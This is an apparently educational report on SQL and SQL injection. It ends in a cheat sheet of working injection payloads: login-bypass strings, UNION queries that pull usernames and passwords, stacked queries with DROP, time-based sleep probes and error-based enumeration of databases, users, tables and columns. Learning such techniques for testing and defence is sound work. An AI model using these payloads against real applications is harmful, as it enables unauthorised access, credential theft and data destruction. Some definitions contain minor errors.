A Detailed Report on

SQL INJECTION

Kunal Singh
25th September 2021
https://github.com/ks1912
https://www.linkedin.com/in/ks1912
https://ks1912.github.io/portfolio
Introduction
1. What is SQL?
2. What is SQL Injection?
3. SQL Injection Cheat Sheet
4. References.

Kunal Singh (ks1912) 1

What is SQL?
● SQL is a language that is used to access and manipulate
databases or relational databases.
● SQL is also known as Structured Query Language.
● SQL became a standard of the American National Standards
Institute (ANSI) in 1986, and the International Organization for
Standardization (ISO) in 1987.
● Some common relational database management systems that use
SQL are Oracle, Sybase, Microsoft SQL Server, Microsoft Access,
Ingres, etc.
● SQL is majorly used in websites that we create where SQL works
in the backend to store the data of the customer.
● SQL comes in many versions and most of them are free to use
and we don’t need very high coding skills to use SQL.
● SQL has some drawbacks too like some versions of SQL are
expensive and due to hidden business rules completed access is
not given to the database.
● We can use SQL to perform certain operations on the existing
database and also we can use this language to create a
database. SQL uses certain commands like Create, Drop, Insert,
etc. to carry out the required tasks.

Kunal Singh (ks1912) 2

● These SQL commands are mainly categorized into four
categories as:
○ DDL – Data Definition Language
○ DQL – Data Query Language
○ DML – Data Manipulation Language
○ TCL – Data Control Language
● Data Definition Language (DDL) is the commands that are used to
define the schema.
● Data Query Language (DQL) are the commands that are used to
perform queries on the data within schema objects.
● Data Manipulation Language (DML) is the commands that are
used for the manipulation of data present in the database.
● Transaction Control Language (TCL) are the commands that are
used for giving and taking rights, permissions, and other controls
of the database system.
● SQL join:

Kunal Singh (ks1912) 3

What is SQL Injection (SQLi)?
● SQL injection is a web security vulnerability that allows an
attacker to interfere with the queries that an application makes to
its database. It generally allows an attacker to view data that they
are not normally able to retrieve.
● A successful SQL injection exploit can read sensitive data from
the database, modify database data (Insert/Update/Delete),
execute administration operations on the database (such as
shutdown the DBMS), recover the content of a given file present
on the DBMS file system and in some cases issue commands to
the operating system.
● Generally, SQLi happens in WEB APIs where the data is being
sent to the databases either by GET method or by POST method.
● Suppose if we are sending data to the database by GET method it
is easy to add some malicious data in URL where is if the data is

Kunal Singh (ks1912) 4

 being sent by POST method we can not see what is being sent
and so we need something to intercept the POST based request
and give us the request that is being sent to the server/database.
● To intercept POST-based requests we use Burpsuit.
● The risk factor of SQLi is high/critical as it can reveal some
sensitive data of the user to the attacker and may compromise in
any kind of backdoor a

SQL/ SQL Injection Cheat Sheet

● SELECT c1, c2 FROM t; Query data in columns c1, c2 from a table
● SELECT * FROM t; Query all rows and columns from a table
● SELECT c1, c2 FROM t WHERE condition; Query data and filter
rows with a condition
● SELECT DISTINCT c1 FROM t WHERE condition; Query distinct
rows from a table
● SELECT c1, aggregate(c2) FROM t GROUP BY c1; Group rows
using an aggregate function
● SELECT c1, aggregate(c2) FROM t GROUP BY c1 HAVING
condition; Filter groups using HAVING clause
● SELECT c1, c2 FROM t ORDER BY c1 ASC [DESC]; Sort the result
set in ascending or descending
● Order SELECT c1, c2 FROM t1 UNION [ALL] SELECT c1, c2 FROM
t2; Combine rows from two queries

Kunal Singh (ks1912) 5

● SELECT c1, c2 FROM t1 INTERSECT SELECT c1, c2 FROM t2;
Return the intersection of two queries
● SELECT c1, c2 FROM t1 MINUS SELECT c1, c2 FROM t2; Subtract a
result set from another result set
● SELECT c1, c2 FROM t1 WHERE c1 [NOT] LIKE pattern; Query rows
using pattern matching %, _
● SELECT c1, c2 FROM t WHERE c1 [NOT] IN value_list; Query rows
in a list
● SELECT c1, c2 FROM t WHERE c1 BETWEEN low AND high; Query
rows between two values
● SELECT c1, c2 FROM t WHERE c1 IS [NOT] NULL; Check if values
in a table is NULL or not
● QUERYING DATA FROM A TABLE QUERYING FROM MULTIPLE
TABLES USING SQL OPERATORS SELECT c1, c2 FROM t ORDER
BY c1 LIMIT n OFFSET offset; Skip offset of rows and return the
next n rows
● SELECT c1, c2 FROM t1 INNER JOIN t2 ON condition; Inner join t1
and t2
● SELECT c1, c2 FROM t1 LEFT JOIN t2 ON condition; Left join t1
and t1
● SELECT c1, c2 FROM t1 FULL OUTER JOIN t2 ON condition;
Perform full outer join

Kunal Singh (ks1912) 6

● SELECT c1, c2 FROM t1 CROSS JOIN t2; Produce a Cartesian
product of rows in tables
● SELECT c1, c2 FROM t1 A INNER JOIN t2 B ON condition; Join t1
to itself using INNER JOIN clause
● INSERT INTO t(column_list) VALUES(value_list); Insert one row
into a table
● INSERT INTO t(column_list) VALUES (value_list), (value_list), ….;

Insert multiple rows into a table

● INSERT INTO t1(column_list) SELECT column_list FROM t2; Insert

rows from t2 into t1
● UPDATE t SET c1 = new_value, c2 = new_value WHERE condition;
Update values in the column c1, c2 that match the condition
● DELETE FROM t; Delete all data in a table
● DELETE FROM t WHERE condition; Delete subset of rows in a
table
● UPDATE t SET c1 = new_value; Update new value in the column c1
for all rows
● Ending / Commenting Out / Line Comments
○ Username: admin'--
○ This is going to log you as the admin, user because the rest
of the SQL query will be ignored.

Kunal Singh (ks1912) 7

SELECT*FROM members WHERE username = 'admin'--' AND password
= 'password'

○ Comments out the rest of the query by not closing them or

you can use it for bypassing blacklisting, removing spaces,
obfuscating and determining database versions. It is known
as Inline comment.

SELECT/*avoid-spaces*/password/**/FROM/**/Members

○ Executing more than one query in one transaction. This is

very useful in every injection point, especially in SQL Server
back ended applications.

;SELECT * FROM members; DROP members-- Ends a query and starts a

new one.

● MySQL If Statement

IF(condition,true-part,false-part)
SELECT IF(1=1,'true','false')

● If MySQL is running in ANSI mode it's going to work but

otherwise, MySQL accepts it as a `logical operator` it'll return 0. A
better way to do it is using the CONCAT()function in MySQL.

CONCAT(str1, str2, str3, ...) Concatenate supplied strings.

SELECT CONCAT(login, password) FROM members

Kunal Singh (ks1912) 8

 ● UNION INJECTION:- This will combine results from both the news
table and members table and return all of them.

SELECT header, txt FROM news UNION ALL SELECT name, pass FROM
members

● Another Example for UNION Injection

'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

● Login ByPass
○ admin’ #
○ admin” #
○ admin’)) #
○ ‘ or 1=1 --+
○ ‘ or 1=1 #
○ " or " ""
○ " or true --
○ " or true --+
○ ‘)) or true -- -
○ admin' or 1=1 or ''='
○ admin') or ('1'='1'--
○ admin') or '1'='1'/*
○ admin") or "1"="1
○ ') or ('1'='1 --

Kunal Singh (ks1912) 9

 ● One or more queries can be executed and their results can be
appended to the original query in MySQL using the UNION
keyword.
○ order by 1,sleep(10) --+
○ ‘ union select @@version,sleep(10),3 --+
○ ‘ union select @@version,sleep(10),3,"'3'"# --+
● Using the UNION keyword, the number of tables in the database
can be determined by incrementing the specified table index
number until an error occurs.
○ ' order by 3 --+
○ ' order by 4 --+
○ ' order by 5 --+ (if it gives an error means that there are 4
tables)
● Getting what columns are displaying the results of a query clearly:
○ ' union select 1,2,3 --+
● Getting the database version number:
○ ’ union select 1,database(),3 --+
● Error Based:
○ Count, floor and group functions can be used in order to
produce the error. These functions are helpful if MySQL isn’t
displaying output via UNION based queries.

(select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a,

floor(rand()*2))a from information_schema.columns group by a)

Kunal Singh (ks1912) 10

 ○ Enumerating database

‘ AND (select 1 from (select count(*), concat(0x3a,0x3a,(select

database()),0x3a,0x3a, floor(rand()*2))a from
information_schema.columns group by a)b) --+

○ Enumerating current user

‘ AND (select 1 from (select count(*), concat(0x3a,0x3a,(select

current_user,0x3a,0x3a, floor(rand()*2))a from
information_schema.columns group by a)b) --+

○ Enumerating table names,

‘ AND (select 1 from (select count(*), concat(0x3a,0x3a,(select

table_name from information_schema.tables where
table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()*2))a from
information_schema.columns group by a)b) --+

○ Enumerating column names

‘ AND (select 1 from (select count(*), concat(0x3a,0x3a,(select

column_name from information_schema.columns where
table_name='users' limit 2,1),0x3a,0x3a, floor(rand()*2))a from
information_schema.columns group by a)b) --+

Kunal Singh (ks1912) 11

References

1. https://www.geeksforgeeks.org/sql-ddl-dml-tcl-dcl/
2. https://www.geeksforgeeks.org/sql-ddl-dql-dml-dcl-tcl-commands/
3. https://www.w3schools.com/sql/sql_injection.asp
4. https://portswigger.net/web-security/sql-injection
5. https://owasp.org/www-community/attacks/SQL_Injection
6. https://portswigger.net/web-security/sql-injection/cheat-sheet
7. https://www.sqltutorial.org/wp-content/uploads/2016/04/SQL-che
at-sheet.pdf
8. https://www.netsparker.com/blog/web-security/sql-injection-cheat
-sheet/
9. https://www.hackingloops.com/sql-injection-cheat-sheet/

Kunal Singh (ks1912) 12